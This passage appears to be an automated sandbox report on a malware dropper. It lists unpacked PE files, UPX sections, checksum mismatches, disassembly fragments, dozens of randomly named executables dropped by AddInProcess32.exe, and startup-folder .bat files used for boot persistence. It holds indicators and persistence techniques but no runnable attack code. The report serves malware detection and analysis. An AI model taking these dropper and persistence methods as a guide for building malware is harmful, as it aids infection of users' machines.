                  Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\x64\Release\WinmonProcessMonitor.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: dbghelp.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp
                  Source: Binary string: dbghelp.pdbGCTL source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp

                  Data Obfuscation

                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeUnpacked PE file: 15.2.syncUpd.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeUnpacked PE file: 16.2.VT4T5BrKWgz9d48cmEd8ePkZ.exe.400000.2.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeUnpacked PE file: 17.2.sUyDoVTGsfEnMY0oeyexTBut.exe.400000.5.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeUnpacked PE file: 18.2.VvPx7JMqkEvTJAQ2rPS2y2wf.exe.400000.5.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeUnpacked PE file: 20.2.MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe.400000.2.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeUnpacked PE file: 25.2.LP2uR8v5nKtflOO7HsEX74Am.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeUnpacked PE file: 30.2.YfSmDepXBWKsGmamEEWNYwB5.exe.400000.6.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeUnpacked PE file: 32.2.pxzTG78L668f3mDyeDkHXryr.exe.400000.6.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
                  Source: C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exeUnpacked PE file: 33.2.MK1r6sTJJ0KuvAGWdjimbW8H.exe.400000.5.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
                  Source: C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exeUnpacked PE file: 36.2.PM6qM9TthMxsL1RAWEhuUNLx.exe.400000.3.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeUnpacked PE file: 15.2.syncUpd.exe.400000.0.unpack
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeUnpacked PE file: 16.2.VT4T5BrKWgz9d48cmEd8ePkZ.exe.400000.2.unpack
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeUnpacked PE file: 17.2.sUyDoVTGsfEnMY0oeyexTBut.exe.400000.5.unpack
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeUnpacked PE file: 18.2.VvPx7JMqkEvTJAQ2rPS2y2wf.exe.400000.5.unpack
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeUnpacked PE file: 20.2.MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe.400000.2.unpack
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeUnpacked PE file: 25.2.LP2uR8v5nKtflOO7HsEX74Am.exe.400000.1.unpack
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeUnpacked PE file: 30.2.YfSmDepXBWKsGmamEEWNYwB5.exe.400000.6.unpack
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeUnpacked PE file: 32.2.pxzTG78L668f3mDyeDkHXryr.exe.400000.6.unpack
                  Source: C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exeUnpacked PE file: 33.2.MK1r6sTJJ0KuvAGWdjimbW8H.exe.400000.5.unpack
                  Source: C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exeUnpacked PE file: 36.2.PM6qM9TthMxsL1RAWEhuUNLx.exe.400000.3.unpack
                  Source: dl7WL77rkA.exeStatic PE information: 0xC398581B [Tue Dec 26 19:12:27 2073 UTC]
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_0040AF7C LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,12_2_0040AF7C
                  Source: MK1r6sTJJ0KuvAGWdjimbW8H.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x423035
                  Source: Tll62OaP8oVLTcLcTrzOXqGl.exe.5.drStatic PE information: real checksum: 0x1eaa5 should be: 0x1d4c14
                  Source: gIvDEh2BZp9B1K9gi8nXHxAG.exe.5.drStatic PE information: real checksum: 0x1eaa5 should be: 0x1d4c14
                  Source: sUyDoVTGsfEnMY0oeyexTBut.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x41eaf6
                  Source: yq7sRYx0zxf2nUHNI8myIvQb.exe.5.drStatic PE information: real checksum: 0x1eaa5 should be: 0x1d4c14
                  Source: pxzTG78L668f3mDyeDkHXryr.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x41eaf6
                  Source: 3BiVM2uOsvGVXA1BoDorVuCU.exe.5.drStatic PE information: real checksum: 0x1eaa5 should be: 0x1d4c14
                  Source: yzAPe25HGnxqbkafYprXvqQ2.exe.5.drStatic PE information: real checksum: 0x1eaa5 should be: 0x1d4c14
                  Source: buQDl25QOPcDefNxAl6eKA66.exe.5.drStatic PE information: real checksum: 0x1eaa5 should be: 0x1d4c14
                  Source: kCfcZTexs2vlrkxr2iahpjn0.exe.5.drStatic PE information: real checksum: 0x1eaa5 should be: 0x1d4c14
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x41eaf6
                  Source: heli0xf9eUcd5qaTU2WhBrox.exe.5.drStatic PE information: real checksum: 0x1eaa5 should be: 0x1d4c14
                  Source: pdCLEldSyO5Ik39YE4kJVbXN.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x41eaf6
                  Source: cUZyyg5Iay7EkA1LG3XxNCAW.exe.5.drStatic PE information: real checksum: 0x1eaa5 should be: 0x1d4c14
                  Source: BroomSetup.exe.13.drStatic PE information: real checksum: 0x0 should be: 0x1c6750
                  Source: H7TIhgIvG1Yhal1QnwrEdA0q.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x423035
                  Source: FXJXJcvxtZRFvWakkN6k83di.exe.5.drStatic PE information: real checksum: 0x1eaa5 should be: 0x1d4c14
                  Source: XbJnQ7YPZT43Q5vvoXLuAoSq.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x41eaf6
                  Source: YHw4f8SZUCkdAWRXPfF1qOas.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x423035
                  Source: YfSmDepXBWKsGmamEEWNYwB5.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x423035
                  Source: INetC.dll.13.drStatic PE information: real checksum: 0x0 should be: 0xb6cc
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x423035
                  Source: nPQO8Z9byTKoW0YecEtJrQN4.exe.5.drStatic PE information: real checksum: 0x1eaa5 should be: 0x1d4c14
                  Source: BitVM4h79HXjwHpz9WBgoxJI.exe.5.drStatic PE information: real checksum: 0x1eaa5 should be: 0x1d4c14
                  Source: PM6qM9TthMxsL1RAWEhuUNLx.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x423035
                  Source: IiRP3mWif0xpaQsabblBwYAE.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x423035
                  Source: SNePs0JIjHDOAKzI11CQ043K.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x41eaf6
                  Source: kDgMkoNM3lKxwY8D8wOiP15F.exe.5.drStatic PE information: real checksum: 0x1eaa5 should be: 0x1d4c14
                  Source: BTnjKpTBDzKtQo69b5SrwYDx.exe.5.drStatic PE information: real checksum: 0x1eaa5 should be: 0x1d4c14
                  Source: Jye7PnMsJdWwQaaabqxbHITx.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x423035
                  Source: IpW6W2Yjx6z6D3j66j3N2tH5.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x41eaf6
                  Source: 4xb6JU3I8UdzuT7ogqFnBL7Y.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x423035
                  Source: LP2uR8v5nKtflOO7HsEX74Am.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x41eaf6
                  Source: UbeikbXa4CwwIN3M94pDVFss.exe.5.drStatic PE information: real checksum: 0x1eaa5 should be: 0x1d4c14
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe.5.drStatic PE information: real checksum: 0x4209a3 should be: 0x423035
                  Source: RC2DCMOzLtOY3PfjMU0omeEi.exe.5.drStatic PE information: real checksum: 0x1eaa5 should be: 0x1d4c14
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_004074E9 push ebp; ret 12_2_004074EA
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_00405DD9 push ecx; ret 12_2_00405DEC
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_004073E7 push 33000001h; retf 12_2_004073EC
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00402E4B push ebx; mov dword ptr [esp], 00413040h13_2_00402EF6
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00401860 push eax; mov dword ptr [esp], ebx13_2_0040192D
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00402613 push ecx; mov dword ptr [esp], ebx13_2_00402634
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_0040183B push ecx; mov dword ptr [esp], eax13_2_0040184E
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_004060FD push eax; mov dword ptr [esp], ebx13_2_004062A3
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_004060FD push ebx; mov dword ptr [esp], 00434400h13_2_004062BE
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_004060FD push eax; mov dword ptr [esp], 0040B410h13_2_00406446
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_004060FD push esi; mov dword ptr [esp], 00000001h13_2_00406505
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_004042BC push eax; mov dword ptr [esp], 00435400h13_2_004042CF
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_004042BC push eax; mov dword ptr [esp], 00435400h13_2_004042F1
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_0040815B push ebx; mov dword ptr [esp], 0042AF40h13_2_00408178
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_0040815B push eax; mov dword ptr [esp], 0042AF40h13_2_004081F0
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00404375 push ecx; mov dword ptr [esp], ebx13_2_004043C9
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00404375 push ebx; mov dword ptr [esp], 0000000Bh13_2_004043E6
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00404375 push eax; mov dword ptr [esp], 00000000h13_2_00404471
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00404375 push edx; mov dword ptr [esp], eax13_2_004044AE
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00404375 push eax; mov dword ptr [esp], ebx13_2_00404590
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00404375 push eax; mov dword ptr [esp], 00435400h13_2_004046E6
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00404375 push ecx; mov dword ptr [esp], 00427D20h13_2_0040475B
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00404375 push eax; mov dword ptr [esp], 00427D20h13_2_004047C0
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00404375 push ebx; mov dword ptr [esp], 00000002h13_2_00404838
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00401B06 push edx; mov dword ptr [esp], eax13_2_00401B53
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00401B06 push edi; mov dword ptr [esp], 00412840h13_2_00401B6A
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00401DB0 push edi; mov dword ptr [esp], eax13_2_00401E18
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_004085B8 push eax; mov dword ptr [esp], ebx13_2_00408671
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_004085B8 push eax; mov dword ptr [esp], ebx13_2_0040873D
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_004085B8 push eax; mov dword ptr [esp], ebx13_2_00408763
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_004085B8 push ecx; mov dword ptr [esp], ebx13_2_004087E3
                  Source: initial sample | Static PE information: section name: UPX0
                  Source: initial sample | Static PE information: section name: UPX1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\gIvDEh2BZp9B1K9gi8nXHxAG.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\nPQO8Z9byTKoW0YecEtJrQN4.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\kCfcZTexs2vlrkxr2iahpjn0.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\cUZyyg5Iay7EkA1LG3XxNCAW.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\H7TIhgIvG1Yhal1QnwrEdA0q.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\65bl5N8ldxUdfHpwZdasCC1T.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeJump to dropped file
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeFile created: C:\Users\user\AppData\Local\Temp\syncUpd.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\nxFajWDYSB3pQQxmrqt3pD1T.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\LEGkdjk2eFexBjdd51KvbC5Q.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\Tll62OaP8oVLTcLcTrzOXqGl.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\IiRP3mWif0xpaQsabblBwYAE.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\YHw4f8SZUCkdAWRXPfF1qOas.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\UbeikbXa4CwwIN3M94pDVFss.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\heli0xf9eUcd5qaTU2WhBrox.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\buQDl25QOPcDefNxAl6eKA66.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\XbJnQ7YPZT43Q5vvoXLuAoSq.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\SNePs0JIjHDOAKzI11CQ043K.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\pdCLEldSyO5Ik39YE4kJVbXN.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeJump to dropped file
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeFile created: C:\Users\user\AppData\Local\Temp\wfplwfs.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\Jye7PnMsJdWwQaaabqxbHITx.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\IpW6W2Yjx6z6D3j66j3N2tH5.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\FXJXJcvxtZRFvWakkN6k83di.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\bAqeOotivBzC3mPFFhCilCro.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\S5LR4MxNYkipKICUEWwDRrcX.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\4xb6JU3I8UdzuT7ogqFnBL7Y.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\RLHqIpTNCBsmKjKBdfgpamFx.exeJump to dropped file
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeFile created: C:\Users\user\AppData\Local\Temp\BroomSetup.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\wHBfjqvEYiXClqcsZASJdtJJ.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeJump to dropped file
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeFile created: C:\Users\user\AppData\Local\Temp\nsh1C9B.tmp\INetC.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeJump to dropped file

                  Boot Survival

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CtKTLlY2LhR3aGX0PpowiHev.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\asxkwIl5OZIGfxZm6YYVmkyp.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cizDnjn04HXlR48gG87ono06.batJump to dropped file
